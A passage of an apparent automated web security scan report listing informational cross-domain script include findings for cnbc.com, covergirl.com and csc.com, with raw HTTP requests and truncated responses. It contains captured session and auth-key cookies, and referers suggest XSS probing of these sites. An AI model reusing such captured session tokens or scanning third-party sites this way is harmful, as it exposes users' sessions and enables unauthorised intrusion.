Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:38:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14782
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.80. http://www.cnbc.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&source=(The%20Associated%20Press%20OR%20Reuters%20OR%20AFX%20OR%20The%20New%20York%20Times%20OR%20CNBC.COM)&layout=NoPic&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zce56gUZZEw56g4QDxJdQx%2fwgxtDBNooSLeqlBQuP1n34%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FqHt53A9BlIs=; TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:26 GMT
Via: 1.1 C aicache6
Content-Length: 229771
Set-Cookie: xaikeeperua=yes; path=/
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Find the latest stock market news, information &amp; headlines. Get u
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.81. http://www.cnbc.com/id/15837856

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15837856

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/15837856 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339051482; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:36 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section &amp; see the full online T
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.82. http://www.cnbc.com/id/15837856/site/14081545/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15837856/site/14081545/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/15837856/site/14081545/ HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:57:32 GMT
Via: 1.1 C aicache6
Content-Length: 184638
X-Aicache-OS: 207.46.150.45:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:38 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View the ...CNBC US Television... section &amp; see the full online T
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<br><script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.83. http://www.cnbc.com/id/15838394

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15838394

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/15838394 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc5CZLOLbsDADnCVB%2fPbg0Qo%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fk2EwXOuiXD0=; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339076706; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CCNBC%252520U.S.%252520T%25257C%25257C15837856%25257CCNBC%252520U.S.%252520Television%25252C%252520TV%252520Schedule%252520for%252520Primetime%252520Te%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15838394%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:58:00 GMT
Via: 1.1 C aicache6
Content-Length: 132851
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:58:07 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="&quot;The Call&quot; is a full hour of analysis, discussion and debat
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.84. http://www.cnbc.com/id/15839263/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15839263/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /id/15839263/ HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vR9Dq3E7N%2f0PZHYpJjzP7Ec%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FWozWH53xFGc=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:40 GMT
Via: 1.1 C aicache6
Content-Length: 103803
X-Aicache-OS: 65.55.53.237:80
Connection: close
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 15:06:47 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="View our CNBC video gallery and find video news clips on the stock ma
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.85. http://www.cnbc.com/pointrollads.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /pointrollads.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pointrollads.htm HTTP/1.1
Host: www.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcEF4XUi6XQh5KDbh%2ft9s8vdxuU1kQdgmk3WPEusCCQGY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F0G3LU09Tixk=; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:06:42 GMT
Via: 1.1 aicache6
Content-Length: 95136
X-Aicache-OS: 65.55.53.237:80
Connection: close

<html class="cnbc_html" xmlns:tvservices="http://www.msnbc.com"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 &quot;http://w
...[SNIP]...
</script>

<script type="text/javascript" lang="javascript" src="http://cdn.gigya.com/JS/socialize.js?apikey=2_Jx5rsFp18pauXYlKGzHQVpbahcR1iJ30bbyfqZsn69A6vbt3dQ7gYFCESWKMM1sP"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

20.86. http://www.covergirl.com/__utm.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /__utm.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /__utm.gif?utmwv=5.1.5&utms=1&utmn=781314454&utmhn=www.covergirl.com&utmcs=UTF-8&utmsr=1920x1200&utmsc=16-bit&utmul=en-us&utmje=1&utmfl=10.3%20r183&utmdt=Beauty%20Products%20from%20COVERGIRL&utmhid=790143979&utmr=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DDirect%2BBeauty%2BProduct&utmp=%2Fbeauty-products%3Futm_source%3Dgoogle%26utm_medium%3Dcpc%26utm_term%3D%25252Bbeauty%252520%25252Bproducts%26utm_campaign%3DCG%2BEvergreen%2BGKW%2B-%2B1011%2B-%2BBMM%26utm_content%3Ds9xEppg8V%257C7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63408


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.87. http://www.covergirl.com/beauty-products

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /beauty-products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198 HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:27 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.88. http://www.covergirl.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.89. http://www.covergirl.com/search/results=makeup%20eyelash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /search/results=makeup%20eyelash

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/results=makeup%20eyelash HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/search/results=xss%20help%20phone%20cable
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.2.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:20 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.90. http://www.covergirl.com/search/results=xss%20help%20phone%20cable

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /search/results=xss%20help%20phone%20cable

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search/results=xss%20help%20phone%20cable HTTP/1.1
Host: www.covergirl.com
Proxy-Connection: keep-alive
Referer: http://www.covergirl.com/beauty-products?utm_source=google&utm_medium=cpc&utm_term=%2Bbeauty%20%2Bproducts&utm_campaign=CG+Evergreen+GKW+-+1011+-+BMM&utm_content=s9xEppg8V|7750439198
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=kmi5afnggj2ugc45ntt0nzzx; sifrFetch=true; __utma=214218501.640054455.1315345533.1315345533.1315345533.2; __utmb=214218501.1.10.1315345533; __utmc=214218501; __utmz=214218501.1315345533.2.2.utmcsr=google|utmccn=CG%20Evergreen%20GKW%20-%201011%20-%20BMM|utmcmd=cpc|utmctr=%20beauty%20%20products|utmcct=s9xEppg8V|7750439198

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:08 GMT
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44418


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en-us">
...[SNIP]...
</script>


<script type="text/javascript" src="https://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.91. http://www.csc.com/application_services/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /application_services/contact_us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /application_services/contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
